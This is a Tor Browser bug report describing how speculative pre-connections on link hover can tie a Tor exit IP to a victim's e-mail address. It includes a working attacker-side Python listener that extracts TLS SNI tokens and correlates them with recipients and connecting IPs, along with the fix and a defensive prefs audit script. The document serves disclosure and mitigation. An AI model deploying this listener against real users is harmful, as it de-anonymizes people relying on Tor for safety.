'network.http.speculative-parallel-limit' default setting provides tracking-risk

(thanks to Yuri Khan for the original scenario - 2015-08-14 22:33:56 PDT)

Potential tracking scenario:

  • the Attacker sends an e-mail to the Victim containing a link (visible text wrapped around a URL)
  • the Victim leaves the mouse cursor over that link text
  • Tor Browser speculatively connects to the link's destination host
  • the Attacker logs these connection attempts and assigns the exit node's IP address to the Victim's e-mail address

The result is that the exit node's IP address can be linked to the e-mail address of the targeted victim, which (should that exit node be seized) could de-anonymize the unaware user behind it.
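What the attacker actually receives from such a speculative connection is worth spelling out, because it shapes how the logging side works. A speculative connection completes the TCP handshake (and, for an https:// link, the TLS handshake) but sends no HTTP request, so the path of the URL never reaches the attacker; what does arrive is the connecting IP address (the Tor exit node's) and, in the TLS ClientHello, the SNI host name. The listener below is an added example written for this page, not code from the report or from the Tor Project; it assumes the attacker puts a per-recipient token in the first DNS label of the link host name (e.g. k7q2m.attacker.example) so that the SNI alone identifies which e-mail the hover came from. All host names, tokens and addresses are constructed.

```python
import socket
import struct
import threading

# Constructed attacker-side table: token used as the first DNS label of each e-mail's
# link host name -> the address that e-mail was sent to. Hypothetical values.
TOKEN_TO_RECIPIENT = {"k7q2m": "victim@example.org"}


def extract_sni(data):
    """Return the host_name from a TLS ClientHello record (RFC 6066 server_name), or None."""
    try:
        if data[0] != 0x16:                            # not a TLS handshake record
            return None
        (rec_len,) = struct.unpack("!H", data[3:5])
        hs = data[5:5 + rec_len]
        if hs[0] != 0x01:                              # not a ClientHello
            return None
        body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
        pos = 2 + 32                                   # client_version + random
        pos += 1 + body[pos]                           # session_id
        (cs_len,) = struct.unpack("!H", body[pos:pos + 2])
        pos += 2 + cs_len                              # cipher_suites
        pos += 1 + body[pos]                           # compression_methods
        (ext_len,) = struct.unpack("!H", body[pos:pos + 2])
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            ext = body[pos:pos + elen]
            pos += elen
            if etype != 0:                             # extension type 0 = server_name
                continue
            p = 2                                      # skip server_name_list length
            while p + 3 <= len(ext):
                name_type = ext[p]
                (name_len,) = struct.unpack("!H", ext[p + 1:p + 3])
                p += 3
                if name_type == 0:                     # name_type 0 = host_name
                    return ext[p:p + name_len].decode("ascii")
                p += name_len
    except (IndexError, struct.error, UnicodeDecodeError):
        pass
    return None


def build_client_hello(host):
    """Constructed minimal ClientHello carrying only a server_name extension (test input)."""
    name = host.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(name)) + name
    sni = struct.pack("!H", len(entry)) + entry
    exts = struct.pack("!HH", 0, len(sni)) + sni
    body = (b"\x03\x03" + b"\x00" * 32 + b"\x00"      # version, random, empty session_id
            + struct.pack("!H", 2) + b"\x13\x01"       # one cipher suite
            + b"\x01\x00"                              # one compression method (null)
            + struct.pack("!H", len(exts)) + exts)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


def correlate(sni, peer_ip, table=TOKEN_TO_RECIPIENT):
    """Tie the connecting IP (the exit node when the victim uses Tor) to the recipient
    whose token is the first label of the SNI host name. None if nothing matches."""
    if not sni:
        return None
    recipient = table.get(sni.split(".", 1)[0])
    if recipient is None:
        return None
    return {"recipient": recipient, "peer_ip": peer_ip}


def serve_once(listener, table=TOKEN_TO_RECIPIENT):
    """Accept one connection and correlate its first record; no HTTP request is awaited."""
    conn, (peer_ip, _) = listener.accept()
    with conn:
        conn.settimeout(5.0)
        first = conn.recv(4096)
    return correlate(extract_sni(first), peer_ip, table)


if __name__ == "__main__":
    # Loopback demo: the client stands in for the Tor exit node. In the real scenario
    # peer_ip is the exit node's address, which is what gets tied to the e-mail address.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        port = listener.getsockname()[1]
        seen = []
        t = threading.Thread(target=lambda: seen.append(serve_once(listener)))
        t.start()
        with socket.create_connection(("127.0.0.1", port)) as client:
            client.sendall(build_client_hello("k7q2m.attacker.example"))
        t.join()
    print(seen[0])
```

Running the file performs the loopback exchange and prints the recipient/IP pair; the same listener bound to a public address would record the exit node's IP instead of 127.0.0.1. Note that even without TLS (an http:// link) the bare TCP connect still leaks the exit IP and the moment of the hover; the SNI is what lets several recipients be told apart on one server.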

This is exploitable in Tor Browser because the preference that controls speculative pre-connections ('network.http.speculative-parallel-limit') defaults to 6, so the feature is enabled (up to six speculative connections in parallel).

A fix that mitigates this problem is to set 'network.http.speculative-parallel-limit' to 0 by default, which disables speculative pre-connections entirely.
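A small audit for that fix, added here as an example and not code from the report or from the Tor Project: it reads a prefs.js, user.js or autoconfig file and reports the effective value of the preference, treating an absent line as the built-in default of 6 that the report cites (the weak state) and only a value of 0 as the mitigation. The two sample files are constructed; the assignment forms it recognises (user_pref, pref, lockPref, defaultPref) are the ones Firefox uses in those files, and like Firefox it takes the last assignment in a file as the one that applies.

```python
import re

PREF = "network.http.speculative-parallel-limit"
BUILTIN_DEFAULT = 6  # Firefox default cited by the report; applies when no file sets the pref

# Assignment forms found in prefs.js / user.js (user_pref, pref) and autoconfig
# files (lockPref, defaultPref). The captured group is the integer value.
_ASSIGN = re.compile(
    r'^\s*(?:user_pref|pref|lockPref|defaultPref)\(\s*"' + re.escape(PREF)
    + r'"\s*,\s*(-?\d+)\s*\)\s*;',
    re.MULTILINE,
)


def speculative_limit(prefs_text):
    """Effective value of the pref according to this file alone; the last assignment wins,
    and a file that never mentions the pref inherits the built-in default."""
    values = _ASSIGN.findall(prefs_text)
    return int(values[-1]) if values else BUILTIN_DEFAULT


def preconnect_disabled(prefs_text):
    """True only when the limit is pinned to 0, which turns speculative connections off."""
    return speculative_limit(prefs_text) == 0


# Constructed sample files: a profile that silently relies on the default (weak),
# and one where a later line applies the fix over an earlier explicit 6.
WEAK_USER_JS = (
    '// no speculative-parallel-limit line here: the built-in default of 6 applies\n'
    'user_pref("network.http.pipelining", false);\n'
)
FIXED_USER_JS = (
    'user_pref("network.http.speculative-parallel-limit", 6);\n'
    'user_pref("network.http.speculative-parallel-limit", 0);\n'
)

if __name__ == "__main__":
    for label, text in (("weak", WEAK_USER_JS), ("fixed", FIXED_USER_JS)):
        print(label, speculative_limit(text), "disabled" if preconnect_disabled(text) else "ENABLED")
```

The check deliberately reports only what the given file establishes: a Tor Browser build can also set the preference in its shipped defaults, so a user.js that is silent on it is "inherits the default" from this file's point of view, not proof of the final value in the running browser.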

References

Trac:
Username: RickGeex_
